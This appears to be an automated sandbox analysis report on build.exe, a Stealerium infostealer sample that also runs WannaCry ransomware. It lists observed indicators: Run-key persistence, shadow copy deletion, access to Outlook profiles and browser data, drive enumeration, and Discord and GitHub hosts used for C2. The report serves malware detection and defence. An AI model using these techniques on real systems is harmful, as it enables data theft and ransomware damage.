Analysis Overview
SHA256
5a7f0ae453a4302dc288e00b6392923906ead1f181d338ab1c02a4a78f78593b
Threat Level: Known bad
The file build.exe was found to be: Known bad.
Malicious Activity Summary
Stealerium
Stealerium family
Wannacry
Deletes shadow copies
Modifies Installed Components in the registry
Reads user/profile data of web browsers
Drops startup file
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook profiles
Adds Run key to start application
Looks up external IP address via web service
Enumerates connected drives
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Windows directory
Drops file in Program Files directory
Detects Pyinstaller
Unsigned PE
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy WMI provider
NTFS ADS
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
outlook_office_path
Kills process with taskkill
Checks processor information in registry
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
outlook_win_path
Checks SCSI registry key(s)
Enumerates system info in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-26 16:41
Signatures
Stealerium family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 16:41
Reported
2024-05-26 16:47
Platform
win11-20240419-en
Max time kernel
299s
Max time network
302s
Command Line
Signatures
Stealerium
Wannacry
Deletes shadow copies
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD128E.tmp | C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD12A5.tmp | C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\waznenvck896 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\"" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\T: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\cacls.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\system32\cacls.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | icanhazip.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Desktop\@[email protected] | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.106\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Windows\Globalization\ICU\icudtl.dat | C:\Windows\system32\cmd.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133612153295161057" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000200000014000000494c200602000400440010001000ffffffff2110ffffffffffffffff424d3600000000000000360000002800000010000000400000000100200000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000